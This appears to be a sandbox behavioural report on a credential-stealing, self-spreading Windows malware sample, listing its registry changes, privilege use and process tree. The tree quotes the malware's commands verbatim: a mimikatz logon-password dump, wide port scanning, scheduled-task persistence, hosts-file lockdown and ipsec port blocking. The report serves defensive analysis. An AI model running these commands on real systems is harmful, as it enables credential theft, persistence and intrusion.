\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ebygjlyru.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2712 cmd.exe 3660 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b63-6.dat nsis_installer_2 behavioral2/files/0x000a000000023b7a-15.dat nsis_installer_1 behavioral2/files/0x000a000000023b7a-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 43 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" kubrser.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kubrser.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing kubrser.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kubrser.exe Key created \REGISTRY\USER\.DEFAULT\Software mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kubrser.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kubrser.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump mkaliieur.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" kubrser.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ kubrser.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ kubrser.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3660 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2204 schtasks.exe 4352 schtasks.exe 4764 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2972 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2972 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1468 kubrser.exe Token: SeDebugPrivilege 1552 kubrser.exe Token: SeDebugPrivilege 1368 vfshost.exe Token: SeDebugPrivilege 4488 mkaliieur.exe Token: SeLockMemoryPrivilege 3556 kecabt.exe Token: SeLockMemoryPrivilege 3556 kecabt.exe Token: SeDebugPrivilege 1580 mkaliieur.exe Token: SeDebugPrivilege 3728 mkaliieur.exe Token: SeDebugPrivilege 4856 mkaliieur.exe Token: SeDebugPrivilege 3532 mkaliieur.exe Token: SeDebugPrivilege 2516 mkaliieur.exe Token: SeDebugPrivilege 4464 mkaliieur.exe Token: SeDebugPrivilege 5064 mkaliieur.exe Token: SeDebugPrivilege 2784 mkaliieur.exe Token: SeDebugPrivilege 3592 mkaliieur.exe Token: SeDebugPrivilege 2604 mkaliieur.exe Token: SeDebugPrivilege 4040 mkaliieur.exe Token: SeDebugPrivilege 5024 mkaliieur.exe Token: SeDebugPrivilege 2684 mkaliieur.exe Token: SeDebugPrivilege 4216 mkaliieur.exe Token: SeDebugPrivilege 2308 mkaliieur.exe Token: SeDebugPrivilege 3028 mkaliieur.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2972 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe 2972 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe 1468 kubrser.exe 1468 kubrser.exe 1552 kubrser.exe 1552 kubrser.exe 4040 xohudmc.exe 3796 gyggue.exe 3204 kubrser.exe 3204 kubrser.exe 5024 kubrser.exe 5024 kubrser.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2972 wrote to memory of 2712 2972 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe 83 PID 2972 wrote to memory of 2712 2972 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe 83 PID 2972 wrote to memory of 2712 2972 2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe 83 PID 2712 wrote to memory of 3660 2712 cmd.exe 85 PID 2712 wrote to memory of 3660 2712 cmd.exe 85 PID 2712 wrote to memory of 3660 2712 cmd.exe 85 PID 2712 wrote to memory of 1468 2712 cmd.exe 87 PID 2712 wrote to memory of 1468 2712 cmd.exe 87 PID 2712 wrote to memory of 1468 2712 cmd.exe 87 PID 1552 wrote to memory of 852 1552 kubrser.exe 89 PID 1552 wrote to memory of 852 1552 kubrser.exe 89 PID 1552 wrote to memory of 852 1552 kubrser.exe 89 PID 852 wrote to memory of 4792 852 cmd.exe 91 PID 852 wrote to memory of 4792 852 cmd.exe 91 PID 852 wrote to memory of 4792 852 cmd.exe 91 PID 852 wrote to memory of 4444 852 cmd.exe 92 PID 852 wrote to memory of 4444 852 cmd.exe 92 PID 852 wrote to memory of 4444 852 cmd.exe 92 PID 852 wrote to memory of 4304 852 cmd.exe 93 PID 852 wrote to memory of 4304 852 cmd.exe 93 PID 852 wrote to memory of 4304 852 cmd.exe 93 PID 852 wrote to memory of 2324 852 cmd.exe 94 PID 852 wrote to memory of 2324 852 cmd.exe 94 PID 852 wrote to memory of 2324 852 cmd.exe 94 PID 852 wrote to memory of 1056 852 cmd.exe 95 PID 852 wrote to memory of 1056 852 cmd.exe 95 PID 852 wrote to memory of 1056 852 cmd.exe 95 PID 852 wrote to memory of 3496 852 cmd.exe 96 PID 852 wrote to memory of 3496 852 cmd.exe 96 PID 852 wrote to memory of 3496 852 cmd.exe 96 PID 1552 wrote to memory of 4968 1552 kubrser.exe 98 PID 1552 wrote to memory of 4968 1552 kubrser.exe 98 PID 1552 wrote to memory of 4968 1552 kubrser.exe 98 PID 1552 wrote to memory of 2448 1552 kubrser.exe 100 PID 1552 wrote to memory of 2448 1552 kubrser.exe 100 PID 1552 wrote to memory of 2448 1552 kubrser.exe 100 PID 1552 wrote to memory of 4740 1552 kubrser.exe 102 PID 1552 wrote to memory of 4740 1552 kubrser.exe 102 PID 1552 wrote to memory of 4740 1552 kubrser.exe 102 PID 1552 wrote to memory of 1460 1552 kubrser.exe 116 PID 1552 wrote to memory of 1460 1552 kubrser.exe 116 PID 1552 wrote to memory of 1460 1552 kubrser.exe 116 PID 1460 wrote to memory of 3996 1460 cmd.exe 118 PID 1460 wrote to memory of 3996 1460 cmd.exe 118 PID 1460 wrote to memory of 3996 1460 cmd.exe 118 PID 3996 wrote to memory of 4368 3996 wpcap.exe 119 PID 3996 wrote to memory of 4368 3996 wpcap.exe 119 PID 3996 wrote to memory of 4368 3996 wpcap.exe 119 PID 4368 wrote to memory of 1632 4368 net.exe 121 PID 4368 wrote to memory of 1632 4368 net.exe 121 PID 4368 wrote to memory of 1632 4368 net.exe 121 PID 3996 wrote to memory of 2168 3996 wpcap.exe 122 PID 3996 wrote to memory of 2168 3996 wpcap.exe 122 PID 3996 wrote to memory of 2168 3996 wpcap.exe 122 PID 2168 wrote to memory of 1452 2168 net.exe 124 PID 2168 wrote to memory of 1452 2168 net.exe 124 PID 2168 wrote to memory of 1452 2168 net.exe 124 PID 3996 wrote to memory of 3028 3996 wpcap.exe 125 PID 3996 wrote to memory of 3028 3996 wpcap.exe 125 PID 3996 wrote to memory of 3028 3996 wpcap.exe 125 PID 3028 wrote to memory of 1968 3028 net.exe 127 PID 3028 wrote to memory of 1968 3028 net.exe 127 PID 3028 wrote to memory of 1968 3028 net.exe 127 PID 3996 wrote to memory of 4412 3996 wpcap.exe 128
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1904
-
C:\Windows\TEMP\tullechui\kecabt.exe"C:\Windows\TEMP\tullechui\kecabt.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3556
-
-
C:\Users\Admin\AppData\Local\Temp\2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-12-28_6bf69e8a8d9a95d00de131a6831d9a3a_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\zbcgklri\kubrser.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2712 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3660
-
-
C:\Windows\zbcgklri\kubrser.exeC:\Windows\zbcgklri\kubrser.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1468
-
-
-
C:\Windows\zbcgklri\kubrser.exeC:\Windows\zbcgklri\kubrser.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1552 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:4444
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4304
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1056
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:3496
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4968
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2448
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4740
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mikjfkcet\jkwhlcpil\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Windows\mikjfkcet\jkwhlcpil\wpcap.exeC:\Windows\mikjfkcet\jkwhlcpil\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3996 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4368 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1632
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:1452
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:3028 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1968
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:4412 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:1580
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:60
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:3676 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2500
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:4540 -
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:32
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:1824
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mikjfkcet\jkwhlcpil\ebygjlyru.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mikjfkcet\jkwhlcpil\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:4304 -
C:\Windows\mikjfkcet\jkwhlcpil\ebygjlyru.exeC:\Windows\mikjfkcet\jkwhlcpil\ebygjlyru.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\mikjfkcet\jkwhlcpil\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\mikjfkcet\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\mikjfkcet\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:3440 -
C:\Windows\mikjfkcet\Corporate\vfshost.exeC:\Windows\mikjfkcet\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "udbstmcqh" /ru system /tr "cmd /c C:\Windows\ime\kubrser.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3664
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "udbstmcqh" /ru system /tr "cmd /c C:\Windows\ime\kubrser.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4764
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mbbrihgpl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\zbcgklri\kubrser.exe /p everyone:F"2⤵PID:3800
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1744
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mbbrihgpl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\zbcgklri\kubrser.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4352
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "iiebbklju" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tullechui\kecabt.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5008
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "iiebbklju" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tullechui\kecabt.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2204
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:736
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2436
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4356
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3976
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1328
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3556
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3124
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3704
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4200
-
-
